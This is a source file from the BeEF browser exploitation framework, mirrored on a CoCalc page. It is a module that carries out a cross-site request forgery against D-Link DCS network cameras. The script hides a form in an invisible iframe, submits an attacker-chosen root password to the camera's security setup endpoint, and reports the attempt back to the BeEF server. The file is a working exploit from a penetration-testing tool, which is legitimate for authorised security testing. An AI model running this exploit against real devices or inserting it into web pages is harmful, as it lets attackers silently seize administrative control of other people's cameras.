CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/camera/dlink_dcs_series_csrf/command.js
¹¹⁵⁴ views

1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var base = '<%= @base %>'; 
9
  var passwd = '<%= @password %>';
10

11
  var dlink_dcs_iframe = beef.dom.createInvisibleIframe();
12

13
  var form = document.createElement('form');
14
  form.setAttribute('action', base + "/setup/security.cgi");
15
  form.setAttribute('method', 'post');
16

17
  var input = null;
18

19
  input = document.createElement('input');
20
  input.setAttribute('type', 'hidden');
21
  input.setAttribute('name', 'rootpass');
22
  input.setAttribute('value', passwd);
23
  form.appendChild(input);
24

25
  input = document.createElement('input');
26
  input.setAttribute('type', 'hidden');
27
  input.setAttribute('name', 'confirm');
28
  input.setAttribute('value', passwd);
29
  form.appendChild(input);
30

31
  dlink_dcs_iframe.contentWindow.document.body.appendChild(form);
32
  form.submit();
33

34
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
35

36
  cleanup = function() {
37
    document.body.removeChild(dlink_dcs_iframe);
38
  }
39
  setTimeout("cleanup()", 15000);
40

41
});
42

43

44

Product

Resources

Company